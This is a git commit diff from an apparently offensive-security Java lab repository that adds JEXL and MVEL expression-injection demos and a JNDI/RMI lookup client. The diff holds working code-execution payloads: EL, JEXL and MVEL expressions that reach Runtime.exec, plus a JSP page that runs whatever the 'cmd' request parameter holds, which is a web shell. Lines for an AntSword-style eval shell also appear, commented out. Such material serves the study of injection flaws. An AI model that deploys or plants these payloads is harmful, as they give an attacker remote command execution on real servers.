add MVEL JEXL :)

Author: Whoopsunix

Command/pom.xml

@@ -45,10 +45,10 @@
 
     <build>
         <plugins>
-            <plugin>
-                <groupId>org.springframework.boot</groupId>
-                <artifactId>spring-boot-maven-plugin</artifactId>
-            </plugin>
+<!--            <plugin>-->
+<!--                <groupId>org.springframework.boot</groupId>-->
+<!--                <artifactId>spring-boot-maven-plugin</artifactId>-->
+<!--            </plugin>-->
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-compiler-plugin</artifactId>

Expression/ELAttack/src/main/webapp/el.jsp

@@ -1,21 +1,21 @@
 <%@ page language="java" contentType="text/html; charset=utf-8" pageEncoding="utf-8" %>
 <h1> EL 写法 </h1>
 
-<h1>反射构造Runtime</h1>
-${"".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"whoami")}
+<%--<h1>反射构造Runtime</h1>--%>
+<%--${"".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"whoami")}--%>
 <h1>反射构造Runtime - 外界参数</h1>
 ${"".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),pageContext.request.getParameter("cmd"))}
 
-<h1>命令执行回显 Ref: https://forum.butian.net/share/886</h1>
-${pageContext.setAttribute("inputStream", Runtime.getRuntime().exec("ifconfig").getInputStream());Thread.sleep(1000);pageContext.setAttribute("inputStreamAvailable", pageContext.getAttribute("inputStream").available());pageContext.setAttribute("byteBufferClass", Class.forName("java.nio.ByteBuffer"));pageContext.setAttribute("allocateMethod", pageContext.getAttribute("byteBufferClass").getMethod("allocate", Integer.TYPE));pageContext.setAttribute("heapByteBuffer", pageContext.getAttribute("allocateMethod").invoke(null, pageContext.getAttribute("inputStreamAvailable")));pageContext.getAttribute("inputStream").read(pageContext.getAttribute("heapByteBuffer").array(), 0, pageContext.getAttribute("inputStreamAvailable"));pageContext.setAttribute("byteArrType", pageContext.getAttribute("heapByteBuffer").array().getClass());pageContext.setAttribute("stringClass", Class.forName("java.lang.String"));pageContext.setAttribute("stringConstructor", pageContext.getAttribute("stringClass").getConstructor(pageContext.getAttribute("byteArrType")));pageContext.setAttribute("stringRes", pageContext.getAttribute("stringConstructor").newInstance(pageContext.getAttribute("heapByteBuffer").array()));pageContext.getAttribute("stringRes")}
+<%--<h1>命令执行回显 Ref: https://forum.butian.net/share/886</h1>--%>
+<%--${pageContext.setAttribute("inputStream", Runtime.getRuntime().exec("ifconfig").getInputStream());Thread.sleep(1000);pageContext.setAttribute("inputStreamAvailable", pageContext.getAttribute("inputStream").available());pageContext.setAttribute("byteBufferClass", Class.forName("java.nio.ByteBuffer"));pageContext.setAttribute("allocateMethod", pageContext.getAttribute("byteBufferClass").getMethod("allocate", Integer.TYPE));pageContext.setAttribute("heapByteBuffer", pageContext.getAttribute("allocateMethod").invoke(null, pageContext.getAttribute("inputStreamAvailable")));pageContext.getAttribute("inputStream").read(pageContext.getAttribute("heapByteBuffer").array(), 0, pageContext.getAttribute("inputStreamAvailable"));pageContext.setAttribute("byteArrType", pageContext.getAttribute("heapByteBuffer").array().getClass());pageContext.setAttribute("stringClass", Class.forName("java.lang.String"));pageContext.setAttribute("stringConstructor", pageContext.getAttribute("stringClass").getConstructor(pageContext.getAttribute("byteArrType")));pageContext.setAttribute("stringRes", pageContext.getAttribute("stringConstructor").newInstance(pageContext.getAttribute("heapByteBuffer").array()));pageContext.getAttribute("stringRes")}--%>
 
-<h1>JS引擎</h1>
-${''.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('whoami')")}
-<h1>JS引擎 - 回显</h1>
-${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("var runtime = java.lang./**/Runtime./**/getRuntime();var process = runtime.exec(\"hostname\");var inputStream = process.getInputStream();var scanner = new java.util.Scanner(inputStream,\"GBK\").useDelimiter(\"\\\\A\");var result = scanner.hasNext() ? scanner.next() : \"\";scanner.close();result;")}
+<%--<h1>JS引擎</h1>--%>
+<%--${''.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('whoami')")}--%>
+<%--<h1>JS引擎 - 回显</h1>--%>
+<%--${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("var runtime = java.lang./**/Runtime./**/getRuntime();var process = runtime.exec(\"hostname\");var inputStream = process.getInputStream();var scanner = new java.util.Scanner(inputStream,\"GBK\").useDelimiter(\"\\\\A\");var result = scanner.hasNext() ? scanner.next() : \"\";scanner.close();result;")}--%>
 
-<h1>蚁剑</h1>
-<%out.print(org.apache.jasper.runtime.PageContextImpl.proprietaryEvaluate(request.getParameter("ant"), String.class, pageContext, null));%>
+<%--<h1>蚁剑</h1>--%>
+<%--<%out.print(org.apache.jasper.runtime.PageContextImpl.proprietaryEvaluate(request.getParameter("ant"), String.class, pageContext, null));%>--%>
 
 <h1>web路径</h1>
 ${pageContext.servletContext.getResource("")}

Expression/JEXLAttack/pom.xml

@@ -0,0 +1,23 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>com.ppp</groupId>
+    <artifactId>JEXLAttack</artifactId>
+    <version>1.0</version>
+    <packaging>jar</packaging>
+
+    <name>JEXLAttack</name>
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-jexl3</artifactId>
+            <version>3.0</version>
+        </dependency>
+    </dependencies>
+</project>

Expression/JEXLAttack/src/main/java/com/ppp/Demo.java

@@ -0,0 +1,25 @@
+package com.ppp;
+
+import org.apache.commons.jexl3.*;
+
+/**
+ * @author Whoopsunix
+ */
+public class Demo {
+    public static void main(String[] args) {
+        String poc = "''.class.forName('java.lang.Runtime').getRuntime().exec('open -a Calculator.app')";
+        System.out.println(eval(poc));;
+    }
+
+    public static Object eval(String poc) {
+        JexlEngine engine = new JexlBuilder().create();
+        JexlExpression Expression = engine.createExpression(poc);
+
+
+        JexlContext Context = new MapContext();
+        //Context.set("foo", 999);
+
+        Object rs = Expression.evaluate(Context);
+        return rs;
+    }
+}

Expression/MVELAttack/pom.xml

@@ -0,0 +1,23 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <modelVersion>4.0.0</modelVersion>
+
+  <groupId>com.ppp</groupId>
+  <artifactId>MVELAttack</artifactId>
+  <version>1.0</version>
+  <packaging>jar</packaging>
+
+  <name>MVELAttack</name>
+
+  <properties>
+    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+  </properties>
+
+  <dependencies>
+    <dependency>
+      <groupId>org.mvel</groupId>
+      <artifactId>mvel2</artifactId>
+      <version>2.2.8.Final</version>
+    </dependency>
+  </dependencies>
+</project>

Expression/MVELAttack/src/main/java/com/ppp/Demo.java

@@ -0,0 +1,26 @@
+package com.ppp;
+
+import org.mvel2.MVEL;
+
+import java.io.Serializable;
+import java.util.HashMap;
+import java.util.Map;
+
+/**
+ * @author Whoopsunix
+ */
+public class Demo {
+    public static void main(String[] args) {
+        String poc = "Runtime.getRuntime().exec(\"open -a Calculator.app\")";
+        System.out.println(eval(poc));
+        ;
+    }
+
+    public static Object eval(String poc) {
+        Map vars = new HashMap();
+        Serializable serializable = MVEL.compileExpression(poc);
+        vars.put("1", poc);
+        Object o = MVEL.executeExpression(serializable, vars);
+        return o;
+    }
+}

Expression/pom.xml

@@ -12,6 +12,8 @@
         <module>OGNLAttack</module>
         <module>SPELAttack</module>
         <module>JxPathAttack</module>
+        <module>JEXLAttack</module>
+        <module>MVELAttack</module>
     </modules>
 
     <name>Expression</name>

JNDIAttack/src/main/java/jndi/Exec.class

@@ -0,0 +1,20 @@
+//package jndi;
+//
+///**
+// * @author Whoopsunix
+// */
+//public class Exec {
+//    static {
+//        System.out.println("static");
+////        new Exec();
+//    }
+//
+//    public Exec() {
+//        System.out.println("Exec");
+//        try {
+//            Runtime.getRuntime().exec("open -a Calculator.app");
+//        }catch (Exception e){
+//
+//        }
+//    }
+//}

JNDIAttack/src/main/java/jndi/Exec.java

@@ -0,0 +1,30 @@
+package jndi;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import java.util.Properties;
+
+/**
+ * @author Whoopsunix
+ */
+public class JNDIClient {
+    public static void main(String[] args) throws Exception {
+//        client1();
+        client2();
+    }
+
+    public static void client1() throws Exception {
+        Properties env = new Properties();
+        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
+        env.put(Context.PROVIDER_URL, "rmi://localhost:1099");
+        Context ctx = new InitialContext(env);
+        ctx.lookup("Exec");
+    }
+
+    public static void client2() throws Exception {
+        // JDK >= 8u121
+//        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
+
+        new InitialContext().lookup("rmi://127.0.0.1:1099/Exec");
+    }
+}